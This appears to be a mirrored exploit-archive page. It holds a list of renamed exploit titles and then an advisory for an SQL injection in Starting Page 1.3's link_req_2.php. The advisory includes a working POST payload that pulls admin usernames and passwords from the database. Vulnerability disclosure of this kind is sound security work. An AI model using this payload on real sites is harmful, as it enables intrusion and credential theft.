bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41009.txt
Offensive Security 3617e005f6 DB: 2017-01-12 
16 new exploits

VMware 2.5.1 - (VMware-authd) Remote Denial of Service
VMware 2.5.1 - 'VMware-authd' Remote Denial of Service
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)
Boxoft Wav 1.0 - Buffer Overflow
VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow

EleCard MPEG PLAYER - '.m3u' Local Stack Overflow
Elecard MPEG Player - '.m3u' Local Stack Overflow

Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)
Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)

Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow
Boxoft WAV to MP3 Converter - 'convert' Buffer Overflow
Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)
Firejail - Privilege Escalation

McAfee Virus Scan Enterprise for Linux - Remote Code Execution
McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution

Ansible 2.1.4 / 2.2.1 - Command Execution

Eggblog < 3.07 - Remote SQL Injection / Privilege Escalation
EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation

PowerClan 1.14a - (footer.inc.php) Remote File Inclusion
PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion

Eggblog 3.1.0 - Cookies SQL Injection
EggBlog 3.1.0 - Cookies SQL Injection

eggBlog 4.0 - SQL Injection
EggBlog 4.0 - SQL Injection

2Capsule - 'sticker.php id' SQL Injection
2Capsule - SQL Injection

ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection
ASPThai.Net WebBoard 6.0 - SQL Injection
Memberkit 1.0 - Remote Arbitrary .PHP File Upload
phpScribe 0.9 - (user.cfg) Remote Config Disclosure
Memberkit 1.0 - Arbitrary File Upload
phpScribe 0.9 - 'user.cfg' Remote Config Disclosure

PowerClan 1.14a - (Authentication Bypass) SQL Injection
PowerClan 1.14a - Authentication Bypass

Webspell 4 - (Authentication Bypass) SQL Injection
webSPELL 4 - Authentication Bypass

eggBlog 4.1.1 - Local Directory Traversal
EggBlog 4.1.1 - Local Directory Traversal

Travel Portal Script Admin Password Change - Cross-Site Request Forgery
Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)

eggBlog 4.1.2 - Arbitrary File Upload
EggBlog 4.1.2 - Arbitrary File Upload
Eggblog 2.0 - blog.php id Parameter SQL Injection
Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting
EggBlog 2.0 - 'id' Parameter SQL Injection
EggBlog 2.0 - 'message' Parameter Cross-Site Scripting

PowerClan 1.14 - member.php SQL Injection
PowerClan 1.14 - 'member.php' SQL Injection
SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection

Dating Script 3.25 - SQL Injection

Starting Page 1.3 - SQL Injection
Starting Page 1.3 - 'linkid' Parameter SQL Injection
Starting Page 1.3 - 'category' Parameter SQL Injection
My link trader 1.1 - 'id' Parameter SQL Injection
Blackboard LMS 9.1 SP14 - Cross-Site Scripting
Huawei Flybox B660 - Cross-Site Request Forgery
Travel Portal Script 9.33 - SQL Injection
Movie Portal Script 7.35 - SQL Injection
2017-01-12 05:01:16 +00:00

39 lines
1.1 KiB
Text
Executable file
Raw Blame History

# Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
# Date: 11-01-2017
# Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11<http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11>
# Exploit Author: Ben Lee
# Contact: benlee9@outlook.com
# Category: webapps
# Tested on: Win7
1. Description
The vulnerable file is "link_req_2.php",all the post parameters do not get filtered,then do sql query。
2. Vulnerable parameters:
'$_POST[category]','$_POST[name]','$_POST[url]','$_POST[description]','$_POST[email]'
3.Proof of Concept:
Url:http://www.example.com/StartingPage/link_req_2.php
Post data:
[category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&email=admin@admin.com&url=www.xxx.com&description=helloworld]
[cid:4be0cc87-4612-4096-ad49-cc18d8cb4033]
Best Regards!
Ben Lee
Reference in a new issue View git blame Copy permalink